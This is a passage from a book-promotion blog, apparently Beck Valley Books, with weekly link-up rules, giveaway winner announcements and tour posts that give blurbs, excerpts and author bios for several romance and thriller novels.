This weekly link up is hosted by Beck Valley Books & these awesome book loving blogs...
Monday
 Leels Loves Books | IrishdaisylovesRomance | Book Babble
Tuesday
Celticlady's Reviews | First Time Mommy Adventures 
Wednesday
Beck Valley BooksCinnamon Hollow Reviews
Thursday
Miki's Hope | Heidi Robbins
Friday
Ebook Addicts | I Love Romance |
Colorimetry
Saturday
3 Partners in Shopping | I Create Purty Thangs | Wishful Endings 
Sunday

For Pre-orders post - PRE-ORDER / genre / title /author
For New Releases post - NEW / genre / title / author
For Free Books post - FREE / genre / title / author / end date 
For Bargain Books post - SALE / price / genre / title / author / end date
(Strictly no Erotica please.  Steamy romance is fine but watch those covers people, incase any underage child is viewing it!)

Here is this weeks awesome selection!

Would you like to share our linkup on your site? click here
Would you like to become a weekly host? sign up here


Come back and check out the new selection every week x


Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          The winner of the Just Three Dates book tour giveaway is…        

The lucky winner is…

Carol G

Congratulations!

Special thanks to author David Burnett for this great giveaway! xx

Didn’t win??
Don’t worry!!
You can always treat yourself to Just Three Dates from here...
Amazon.com | Barnes & Noble | Paperback

When their mothers become matchmakers, entangling them in a series of dates with each other, Karen and Mark must each decide whether to entertain the idea of a “marriage of convenience,” or to hold out for an increasingly unlikely marriage based on love.

Since breaking with her last boyfriend, Karen has refused to trust any man her age. For the past three years, she has not dated the same one twice, and only one in ten has received even a goodnight kiss as she turned him away. Karen is an artist. She follows her feelings, lives in a cluttered loft, and gushes over vivid sunsets.

Mark still dreams about his almost-fiancée, and his date book has been empty since he threw her out a week before he’d planned to ask for her hand. His friends call him the “Ice Man,” since he seldom smiles, especially at a woman. A math professor at the College, logic guides his behavior, he loves order, and an elegant proof is a thing of beauty.

Both Karen and Mark have all but abandoned hope of ever falling in love, and, left on their own, these opposites would never attract. So, their mothers become matchmakers, entangling them in a series of dates by extracting promises that Karen and Mark will go out together three times, suggesting that, in the absence of love, a “marriage of convenience” is a live option.

If you enjoy heartwarming stories based on true-to-life behaviors, with complicated relationships and a less-than-certain outcome, this book is for you.



Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Winner of the Bad Boys After Dark: Carson book tour giveaway is…        

The lucky winners are…

Amber H
Maria F

Congratulations!

Special thanks to author Melissa Foster for this great giveaway!

Didn’t win? 
Don’t worry!
You can always treat yourself to Bad Boys After Dark: Carson from here…
Amazon.com | Amazon.co.uk | Barnes and Noble | KOBO | iBooks | GPlay

Indulge your inner vixen with these sexy billionaires!

Meet the Bad Boys... Four fiercely loyal, sinfully sexy, uber alpha brothers, about to fall head over heels for their leading ladies.

Second chances really do exist…...
As the founder of a multimillion-dollar international security business, Carson Bad exposes secrets for a living. He knows better than to forge relationships built on them. But for years he did just that with his best friend, and secret lover, Tawny Bishop. She brought a sense of calm and understanding to his life—in and out of the bedroom. Until one fateful night when a knock at the door changed everything.

Tawny is no longer a naive college student. She’s a sought-after perfumer living in Paris. She has plenty of resources at her fingertips, and lots of lonely nights to think about the only man she’s ever loved—the one she ran away from all those years ago. She needs to move forward with her life, but how can she when Carson still owns her heart?

Maybe showing up in the middle of the night unannounced isn’t the best route to unraveling the past and figuring out her future, but Tawny has played it safe for ten long years, and it's only made her long for the man she never should have walked away from. Now she's back in Carson’s life, and he’s determined not to make the same mistake twice. If only he knew what that mistake was…

The Bad Boys are a series of stand-alone romances that may also be enjoyed as part of the larger Love in Bloom series.

**CONTENT WARNING: Due to mature content, recommended for readers aged 18+**



Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          City of Gold by Carolyn Arnold (Matthew Connor Adventure Series Book 1) plus $15 Paypal Giveaway        
Finding the Inca’s lost City of Gold would be the discovery of a lifetime. But failing could mean her death... 

Archaeologist Matthew Connor and his friends Cal and Robyn are finally home after a dangerous retrieval expedition in India. While they succeeded in obtaining the priceless Pandu artifact they sought, it almost cost them their lives. Still, Matthew is ready for the next adventure. Yet when new intel surfaces indicating the possible location of the legendary City of Gold, Matthew is hesitant to embark on the quest.

Not only is the evidence questionable but it means looking for the lost city of Paititi far away from where other explorers have concentrated their efforts. As appealing as making the discovery would be, it’s just too risky. But when Cal’s girlfriend, Sophie, is abducted by Matthew’s old nemesis who is dead-set on acquiring the Pandu statue, Matthew may be forced into action. Saving Sophie’s life means either breaking into the Royal Ontario Museum to steal the relic or offering up something no one in his or her right mind can refuse--the City of Gold.

Now Matthew and his two closest friends have to find a city and a treasure that have been lost for centuries. And they only have seven days to do it. As they race against the clock, they quickly discover that the streets they seek aren’t actually paved with gold, but with blood.

Available to buy from the following sites...
Amazon.com   Amazon.co.uk   Barnes & Noble   Apple iBooks   GPlay   Kobo


Action-adventure books for the mystery lover. 
Does treasure hunting excite you? 
What about the thought of traveling the globe and exploring remote regions to uncover legends that the world has all but forgotten? 
If so, strap yourself in for an adventure with modern-day archaeologist Matthew Connor and his two closest friends. Indiana Jones meets the twenty-first century. 

 This is the perfect book series for fans of Indiana JonesLara CroftNational Treasure, and The Relic Hunter.


Read an excerpt


About the author
CAROLYN ARNOLD is an international best-selling and award-winning author, as well as a speaker, teacher, and inspirational mentor. She has four continuing fiction series—Detective Madison Knight, Brandon Fisher FBI, McKinley Mysteries, and Matthew Connor Adventures—and has written nearly thirty books. Her genre diversity offers her readers everything from cozy to hard-boiled mysteries, and thrillers to action adventures.

Both her female detective and FBI profiler series have been praised by those in law enforcement as being accurate and entertaining, leading her to adopt the trademark: POLICE PROCEDURALS RESPECTED BY LAW ENFORCEMENT™.

Carolyn was born in a small town and enjoys spending time outdoors, but she also loves the lights of a big city. Grounded by her roots and lifted by her dreams, her overactive imagination insists that she tell her stories. Her intention is to touch the hearts of millions with her books, to entertain, inspire, and empower.

She currently lives just west of Toronto with her husband and beagle and is a member of Crime Writers of Canada.
Find the author on the following sites... 
Newsletter   Website   Facebook   Twitter    Google+   Pinterest   Goodreads   Amazon Author Page

Follow the book tour


018836-glossy-silver-icon-symbols-shapes-square-2

NOW FOR THE AUTHOR'S GIVEAWAY !!

Win $15 Paypal Cash
Open Worldwide
Ending on Sunday 20th August at 11.59pm EST

Enter Below & Good Luck !!
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE




Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Looking for FREE and BARGAIN books? Check them all out here!        


Sharing the Love of Books
Enjoy our selection of New Releases / Free & Bargain Books this week

Authors please feel free to add your own books
Readers please free to add your own finds
(any genre except erotica welcome)

This weekly link up is hosted by Beck Valley Books & these awesome book loving blogs...
Monday
 Leels Loves Books | IrishdaisylovesRomance | Book Babble
Tuesday
Celticlady's Reviews | First Time Mommy Adventures 
Wednesday
Beck Valley BooksCinnamon Hollow Reviews
Thursday
Miki's Hope | Heidi Robbins
Friday
Ebook Addicts | I Love Romance |
Colorimetry
Saturday
3 Partners in Shopping | I Create Purty Thangs | Wishful Endings 
Sunday

For Pre-orders post - PRE-ORDER / genre / title /author
For New Releases post - NEW / genre / title / author
For Free Books post - FREE / genre / title / author / end date 
For Bargain Books post - SALE / price / genre / title / author / end date
(Strictly no Erotica please.  Steamy romance is fine but watch those covers people, incase any underage child is viewing it!)

Here is this weeks awesome selection!

Would you like to share our linkup on your site? click here
Would you like to become a weekly host? sign up here


Come back and check out the new selection every week x


Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Love giveaways? Pop on over to our giveaway linkup this week!        
Welcome to our Giveaway Linkup hosted by Beck Valley Books,  Finger Click Saver, and Life as Leels
This is a great place to list and find giveaways hosted all around the blogosphere by some great bloggers.
  • List your giveaways below, remember to add your end dates.
  • Hop over and enter 1 or 2 (or all) of the giveaways! If you're the lucky winner, we'd love to hear!
For more giveaways, sweeps and contests, check out our Giveaway Group on Facebook.


Join our facebook group

Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          GRAND FINALE BLITZ: Rebel in a Small Town by Kristina Knight (Harlequin Super Romance)        
On Tour with Prism Book Tours.

Book Tour Grand Finale for
Rebel in a Small Town
By Kristina Knight

We hope you enjoyed the tour! If you missed any of the stops
you can see snippets, as well as the link to each full post, below:

Launch - Note from the Author

My family's special project for this new series is continuing with the release of Rebel in a Small Town, too. We’re donating a portion of the proceeds from the Slippery Rock series toward providing Sweet Cases from TogetherWeRise to foster children. Most children going in to foster care have nothing but the clothes on their backs. Sweet Cases are duffel bags given to children coming in to care, and once given, the bags remain with that child, giving them a sense of home and, hopefully, a sense that they aren't alone. Each duffel includes a warm blanket, a teddy bear, hygiene kit, and art supplies.

— Kristina


Sylv.net - Story Inspiration

I love a rebel! Especially, a rebel that is a little bit unexpected, and I hope that’s what you’ll love about Rebel in a Small Town. Because instead of James – the hero – being the big, bad rebel…it’s Mara. And she’s not so much a crazed, angry, rebel without a cause (although I do like a good rebel without a cause) as a women trying to live down her rebellious past.


“Touché.” James put his hands in his pockets. “You look good.”

“So now that I’m not an attached lesbian-slash- bisexual, you’re going straight into hook-up mode?”

James grinned. “It was a statement of fact,” he said, “not an invitation for either of us to go jumping into whatever lake we were swimming in up until two years ago.”


"Mara and James’ story, the second in the Slippery Rock series, is a sweet second chance/secret baby romance. . . . Slippery Rock was heartening; their HEA, when it comes, is very sweet. Seeing the rest of their collection of friends once again makes me anxious to see what will be in store for future books in the series, especially Adam and Jenny, Levi, and the mysterious, absent Aiden."

Hearts & Scribbles - Top 5 Rebel Movies

Movies are my favorite form of entertainment - next of books, natch! Rom-coms, dramas, action flicks, period dramas, historical reenactments…I’ll watch anything at least once. But I’ll watch a good rebel movie more than once. In some cases, hundreds of times.


She motioned to her bag and tried to shout above the racket of the beepers. “I’m with Cannon Security,” she said, but the teenager kept wielding the broom handle at her like it was a machete. “I’m on a security check,” she said, trying again, but neither of the employees seemed able to hear her. Maybe the two of them didn’t want to hear her.


"Star-crossed lovers, town secrets and a surprise baby … just a few of the things that make this such a fun read! A visit to Slippery Rock is always satisfying!"

Mythical Books - Top 5 Rebel Songs

5. Pink Floyd, Another Brick in the Wall: I think my love of this song comes directly from my dad’s disdain for it. He was a school teacher, and took great offense to a chorus of ‘we don’t need no education’…which, of course, meant I just had to love it. It helped that one of my older brother’s friends (who I thought was quite cute) used to play it while he was working on his old beater car. Sans shirt.

Deal Sharing Aunt - Interview

Does writing energize or exhaust you? – A little bit of both, actually. When the words are flowing, I have a tendency to get totally lost…which leads to more time at the keyboard than I should probably spend…which leads to lost sleep and caffeine highs…and coming down from those is exhausting!


"One thing I love about a book series is that it allows you to return to your favorite place and find out what’s happening to some of your favorite townsfolk. . . . While there are some adult situations in the book, it’s an entertaining small town read that makes me look forward to Ms. Knight’s next Slippery Rock book."

It's All About the Romance - James’ Tips for Reforming a Rebel

Loving a rebel is a hard thing, especially when you’re neck-deep in sheriff duties. And, you know, when your family has been the law in your town for longer than you can remember. People have expectations. And thoughts. And expectations.


"This book has history, love, friendship, humanity and sexual chemistry. The small Town of Slippery Rock is being rebuilt by everyone that once loved it. You don't want to miss this sweet heart warming story about a Rebel coming home!"


“Mara.” His voice was quiet, and the sound of her name on his lips made the sizzle burn a little hotter. She froze, needing to keep the heat between them under control, but wanting it to burst out like a wildfire. His mouth hit hers, but instead of the anger that had fueled that kiss outside the B and B, the contact was slow. Smooth. And it nearly undid her. His mouth was strong against hers, familiar, and yet it was as if he had never kissed her before.

Nicole's Book Musings - Mara’s Tips for Dating a Good Man

The thing is, you can’t run forever. I learned that the hard way, when I fell in love with James Calhoun. I ran, and my life hasn’t been the same since. My problem is that I can’t run anymore because there are more than just my feelings to think about. I have Zeke’s feelings to consider. And James’.

Harlie's Books - Excerpt & Review

“No, no, no. Please, no.”

The siren grew louder, and a few cars passing on the street pulled to the side.

“Let it be a fire. Let it be a fire.”

But it wasn’t a red fire truck that entered the parking lot. It was a big black SUV with Wall County Sheriff plastered along its side. She was definitely not making it to the B and B for snack time.

"Secret baby, childhood friends to lovers, small town tropes, oh my. Sign me up. Not to mention the secret that is between them that the town still blames Mara squarely for. This book has it all for me. Plus, it has smexy times and what an opening to a book. Ms. Knight shook up the mold when she wrote Mara and James."


James cupped his hands around her neck, pulling her to him. Mara squeaked as he laid his lips on hers, silencing her before she could say, for the fifteenth time, that she could be everything for the little boy in the picture. That James could walk away and never feel guilty about it. As if that would ever happen.

"This book warmed my heart. I grew up in a small town called Slippery Rock. When I saw that this town was called Slippery Rock, I knew I had to read it. We moved away from there, but it is always good to go home."

And don't forget to enter the giveaway below, if you haven't already...

Rebel in a Small Town
(Slippery Rock #2)
Kristina Knight
Contemporary Romance
Paperback & ebook, 384 pages
July 1st 2017 by Harlequin Superromance

He's not giving up his family without a fight

James Calhoun has never been able to resist Mara Tyler, or her knack for mischief. Her reputation as a reckless teenager drove Mara from their hometown. So Slippery Rock is the last place James ever expected to see her, and Mara's timing couldn't be worse. With the upcoming election for sheriff, she threatens the squeaky-clean image James needs to win. Because Mara has brought with her the result of their steamy affair: his two-year-old son, Zeke. After the initial shock, James is determined to have both his family and career. He just needs to convince Mara that her home is where it's always been. With him.


Other Books in the Series

Famous in a Small Town
(Slippery Rock #1)
Kristina Knight
Contemporary Romance
Paperback & ebook, 384 pages
May 1st 2017 by Harlequin Superromance

Lifestyles of the small-town famous

Forced to leave Nashville after a scandal, Savannah Walters has come home to Slippery Rock, Missouri, with a bruised ego and her singing career in jeopardy. As if that isn't humiliating enough, on her way into town she's rescued by her swoon-worthy childhood crush, Collin Tyler.

His hands are full running the family orchard and dealing with his delinquent teen sister, so Collin doesn't need to get involved with someone as fiery and unpredictable as Savannah. But the intense attraction between them can't be denied. And when disaster strikes, they'll both be surprised by who's still standing when the dust settles.

Goodreads│Amazon│Barnes & Noble│Harlequin│iBooks│Kobo

And coming September 2017...

Breakup in a Small Town
(Slippery Rock #3)
Kristina Knight
Contemporary Romance
Paperback & ebook, 384 pages
September 1st 2017 by Harlequin Superromance

This isn't the man she married…

Jenny Buchanan never considered what "for better or for worse" meant when she married Adam Buchanan at nineteen. Six years and two little boys later, "for worse" arrives in the form of a tornado that ravages Slippery Rock and injures Adam. Now he's a stranger to his family…and love won't be enough to bring him back.

Only when Jenny asks him to move out does Adam become the husband she needs…but Adam isn't the only one who's changed. As their attraction sparks back to life, Jenny and Adam must learn what it is to grow up—and grow together—before this small-town breakup lasts forever.


About the Author


Once upon a time, Kristina Knight spent her days running from car crash to fire to meetings with local police--no, she wasn't a troublemaker, she was a journalist. Her career took her all over the United States, writing about everything from a serial killer's capture to the National Finals Rodeo. Along the way, she found her very own Knight in Shining Cowboy Boots and an abiding love for romance novels. And just like the characters from her favorite books, she's living her own happily ever after.

Kristina writes sassy contemporary romance novels; her books have appeared on Kindle Best Seller Lists. She loves hearing from readers, so drop her a line!

Website│Goodreads│Facebook│Twitter│Pinterest│BookBub│Google+│Amazon

Other Harlequin Superromance Books by the Author


Tour Giveaway

- 1 winner will receive a signed copy of Protecting the Quarterback and some fun swag
- US residents only
- Ends July 25th

Grab Our Button!

Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          BOOK TOUR - IN Control (An Ivy Nash Thriller, Book 5) (Redemption Thriller Series) by John W Mefford        
COMING SOON....

A child is kidnapped, sending a mother into a panicked frenzy. It’s one of a dozen such crimes across central Texas, targeting those who live behind the pristine brick walls of master planned communities.

Ivy Nash hunts the kidnappers, but she quickly sees this case morph into something else entirely different…more dangerous, more twisted than anyone could imagine.

At the same time, the father of Ivy’s long-time friend pleads with her to do what no friend would ever want. But what she learns could shatter their worlds. An international drug trafficking ring. A professional hit. And one cover-up after another.

Secrets from the past are exposed, but how can Ivy separate reality from a smokescreen of falsehoods? With lives on the line, she can’t fail. The clock is ticking…

Available to pre-order from....
Amazon.com   Amazon.co.uk   Barnes and Noble    iBooks   Kobo   Paperback

"Rife with deceit and deception and characters that leap off the page, this story is told with confidence through a sure hand, engaging both the mind and the heart. A compelling treat." -- Steve Berry, New York Times Bestselling Author

"An intense and heart wrenching story that keeps you engaged from beginning to end."-- Simon Wood, USA TODAY Bestselling Author of DECEPTIVE PRACTICES.

"I love the way that Mefford writes, seamlessly jumping between characters and time frames with no confusion, and he is extremely descriptive of the setting . You almost feel like you are watching a movie instead of reading a book!" -- Hilary Mahoney, Elusive Red Tiger

Above reviews from An Ivy Nash Thriller, Book 1, IN Defiance

Books in the Alex Troutt Thriller Series:
AT Bay AT Large
AT Once
AT Dawn
AT Dusk
AT Last

 
Books in the Ivy Nash Thriller Series:
IN Defiance
IN Pursuit
IN Doubt
Break IN
IN Control
Coming soon....
IN The End

Q&A with author John W. Mefford: 
Q: What do the Ivy Nash Thrillers have to do with the Redemption Thriller Series?

JWM: The Ivy Nash Thrillers comprise the second sub-series in the Redemption Thriller Series. The Alex Troutt Thrillers are the first sub-series. While I'll eventually write a series that connects the major characters and plots from all the sub-series, you don't have to read the AT books prior to the IN books. But I have to say, the AT thrillers are darn good.

Q: So you're saying you don't have to read the Alex Troutt Thrillers before the Ivy Nash Thrillers?

JWM: Nope. While a few of the characters might occasionally overlap between the series, they can be read as stand-alone. And then I'll wrap everything up in a final set of six novels that connects all of the main characters and stories from each sub-series. If you haven't read any of the Alex Troutt thrillers yet, you can try out the first three at a pretty nice discount. Just search for Alex Troutt Box Set.

Q: Can you give some insight into how Ivy Nash might connect to Alex Troutt down the line?

JWM: Sure…and then I'll send over a hit squad. Seriously, I'll be sprinkling in a few clues along the way for those who pay close attention to the details, but it will all come together in that final six novels of the Redemption Thriller Series. And it will be explosive and gut-wrenching at the same time.

Q: How many different sub-series are you planning to have in the Redemption Thriller Series?

JWM: Right now, I see four sub-series in the Redemption Thriller Series, with six novels in each. It's the most challenging and fulfilling creative endeavor I've undertaken. I hope you enjoy the journey.

About the Author
Amazon #1 Bestselling Author, #2 bestselling author on Barnes and Noble, and a Readers' Favorite Gold Medal winner.

A veteran of the corporate wars, former journalist, and an astute observer of human and social behavior, John W. Mefford has been writing his debut novel since he first entered the work force almost thirty years ago, although he never put words on paper until 2009. Once he started writing, however, he couldn't stop.

A member of International Thriller Writers, John writes novels full of electrifying suspense -- the same types of books he has loved to read since before he could shave.

When he’s not writing, he chases his youth on bike or a basketball court, all while making mental notes of people and societies across the land.



Follow the tour

018836-glossy-silver-icon-symbols-shapes-square-2

Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          BOOK TOUR - Sunsets at Seaside (Sweet with Heat: Seaside Summers Book 4) by Addison Cole        
NEW RELEASE........ 

Sweet with Heat: Seaside Summers features a group of fun, flirty, and emotional friends who gather each summer at their Cape Cod cottages. They're sassy, flawed, and so easy to relate to, you'll be begging to enter their circle of friends! All books can be read as stand-alone novels.

Sunsets at Seaside by Addison Cole is the sweet edition of New York Times bestselling author Melissa Foster's steamy romance novel Seaside Sunsets. The stories and characters remain the same and convey all of the passion you expect between two people in love, without any explicit scenes or harsh language.

In SUNSETS at SEASIDE… 
Jessica Ayers has lived a sheltered life with little more than cello lessons and practices taking up her day. Now a member of the Boston Symphony Orchestra, she escapes the prim and proper symphony to vacation in the Seaside community in Wellfleet, Massachusetts, to determine if she is living life to the fullest or missing it altogether.

For the first time since developing the second largest search engine in the world, billionaire Jamie Reed is taking the summer off. He plans to work from the Cape and spend time with his elderly grandmother—and falling in love is not in his plans.

From the moment Jamie and Jessica meet, the attraction is white-hot. Once-overly-focused Jamie can think of little else than sweet, smart, and alluring Jessica, and Jessica discovers a side of herself she never knew existed. But when Jamie’s business encounters trouble and his attorney and best friend intervenes, he proves that the brown-haired beauty is too distracting for Jamie. To make matters worse, it appears that Jessica might not be who she says she is, turning Jamie’s life—and his heart—upside down. In a world where personal information is always one click away, Jamie must decide if he should trust his heart or watch the woman he loves walk away.

Sunsets at Seaside is the sweet edition of the steamy romance novel Seaside Sunsets by New York Times bestselling author Melissa Foster.

Available to buy from ...
Amazon.com   Amazon.co.uk   Barnes and Noble    KOBO    iBooks   GPlay   Paperback




Also available... 
Read, Write, Love at Seaside (Sweet with Heat: Seaside Summers Book 1)
Bestselling author Kurt Remington lives to write. He spends twelve hours a day in front of his computer, rarely leaving the seclusion of his beach-front property, where he’s come to finish his latest thriller — that is, until free-spirited Leanna Bray nearly drowns in the ocean trying to save her dog. Kurt’s best-laid plans are shot to hell when he comes to their rescue. Kurt’s as irritated as he is intrigued by the sexy, hot mess of a woman who lives life on a whim, forgets everything, and doesn’t even know the definition of the word organized.

Leanna’s come to the Cape hoping to find a fulfilling career in the jam-making business, and until she figures out her own life, a man is not on the menu. But Leanna can’t get the six-two, deliciously muscled and tragically neat Kurt out of her mind. She tells herself she’s just stopping by to say thank you, but the heart-warming afternoon sparks an emotional and unexpectedly sweet ride as Kurt and Leanna test the powers of Chemistry 101: Opposites Attract.

Read, Write, Love at Seaside is the sweet edition of steamy romance novel Read, Write, Love by New York Times bestselling author Melissa Foster.

Get the 1st book FREE!!
Available to buy from ...

Dreaming at Seaside (Sweet with Heat: Seaside Summers Book 2)
Bella Abbascia has returned to Seaside Cottages in Wellfleet, Massachusetts, as she does every summer. Only this year, Bella has more on her mind than sunbathing and skinny-dipping with her girlfriends. She’s quit her job, put her house on the market, and sworn off relationships while she builds a new life in her favorite place on earth. That is, until good-time Bella’s prank takes a bad turn and a handsome police officer appears on the scene.

Single father and police officer Caden Grant left Boston with his fourteen-year-old son, Evan, after his partner was killed in the line of duty. He hopes to find a safer life in the small resort town of Wellfleet, and when he meets Bella during a night patrol shift, he realizes he’s found the one thing he’d never allowed himself to hope for—or even realized he was missing.

After fourteen years of focusing solely on his son, Caden cannot resist the intense attraction he feels toward beautiful Bella, and Bella’s powerless to fight the heat of their budding romance. But starting over proves more difficult than either of them imagined, and when Evan gets mixed up with the wrong kids, Caden’s loyalty is put to the test. Will he give up everything to protect his son—even Bella?

Dreaming at Seaside is the sweet edition of the steamy romance novel Seaside Dreams by New York Times bestselling author Melissa Foster.

Available to buy from ...
Amazon.com   Amazon.co.uk   Barnes and Noble    KOBO    iBooks   GPlay   Paperback

Hearts at Seaside (Sweet with Heat: Seaside Summers Book 3)
Jenna Ward is vivacious, spontaneous, and confident—except when she’s around the man who stole her heart years earlier, strikingly handsome, quiet, and reliable Pete Lacroux. After years of trying to get his attention and overwhelmed from dealing with her mother’s new cougar lifestyle, Jenna’s giving up on Peter—and is ready to explore other men. 

As the eldest of five siblings, with an alcoholic father to care for, boat craftsman Pete Lacroux always does the right thing and has no time for a real relationship. He’s looking forward to seeing his friend Jenna, a welcome distraction who’s so sexy and painfully shy that she equally entertains and confuses him. 

When Jenna picks up a hard-bodied construction worker, jealousy ignites Pete’s true feelings, and he’s unable to ignore the desires for Jenna he never realized he had. But Pete’s not the quiet guy he appears to be, and his life is anything but conducive to a relationship. Can Jenna handle the real Pete Lacroux—the most alpha male she’s ever seen—or will she crack under pressure? And can Pete reclaim the life he once had without tearing apart his family? 

Hearts at Seaside is the sweet edition of the steamy romance novel Seaside Hearts by New York Times bestselling author Melissa Foster.

Available to buy from ...
Amazon.com   Amazon.co.uk   Barnes and Noble    KOBO    iBooks   GPlay   Paperback

Secrets at Seaside (Sweet with Heat: Seaside Summers Book 5)
Tony Black is the hottest surfer on the planet. He travels the world throughout the year and spends his summers on Cape Cod with his friends, at the Seaside cottages in Wellfleet, Massachusetts. He’s got his choice of women, but Amy Maples is the one he wants. Fourteen years ago she was his for an entire summer, until a devastating accident changed everything, and what they had seemed like it had never existed—at least for her.

Amy Maples is as consistent as the day is long. She’s spent summers on Cape Cod forever, she always does the right thing, and she’s spent years trying to reclaim the heart of Tony Black, the only man she’s ever loved. She’s back for a summer of fun with her friends at Seaside, only this year she’s been offered the opportunity of a lifetime thousands of miles away, and she’s decided to try one last time to reconnect with Tony. But having a relationship with Tony means dealing with her past—and dealing with her past may knock her to her knees.

Secrets at Seaside is the sweet edition of the steamy romance novel Seaside Secrets by New York Times bestselling author Melissa Foster.

Releasing October 25th
Available to pre-order from ...

Sweet with Heat: Seaside Summers 
Coming Soon!
Nights at Seaside (releasing December 13th)
Seized by Love at Seaside 
Embraced at Seaside 
Lovers at Seaside 
Whispers at Seaside


About the author
SIGN UP for ADDISON'S Sweet with Heat newsletter. Fun, flirty romance with a dash of heat. www.AddisonCole.com/Newsletter

DOWNLOAD the first book in Addison's Sweet with Heat: Seaside Summers series free: READ, WRITE, LOVE AT SEASIDE

Addison Cole is the sweet alter ego of New York Times and USA Today bestselling and award-winning author Melissa Foster. She writes humorous and emotional sweet contemporary romance. Her books do not include explicit sex scenes or harsh language. Addison spends her summers on Cape Cod, where she dreams up wonderful love stories in her house overlooking Cape Cod Bay.

Addison enjoys discussing her books with book clubs and reader groups and welcomes an invitation to your event.

Addison’s books are available in paperback, digital, and audio formats.

Find Addison on the following sites....
Website   Newsletter   Facebook   Twitter    Google+   Pinterest   Goodreads   Bookbub   Amazon Author Page



Follow the Book Tour
018836-glossy-silver-icon-symbols-shapes-square-2

NOW FOR THE AUTHOR'S GIVEAWAY !!
Win this gorgeous Addison Cole tote bag
Ending on Sunday 17th September at 11.59pm EST
Open Worldwide

Enter Below & Good Luck !!
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE





Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Ready to enter some giveaways? Add your own to our linky too!        
Welcome to our Giveaway Linkup hosted by Beck Valley Books,  Finger Click Saver, and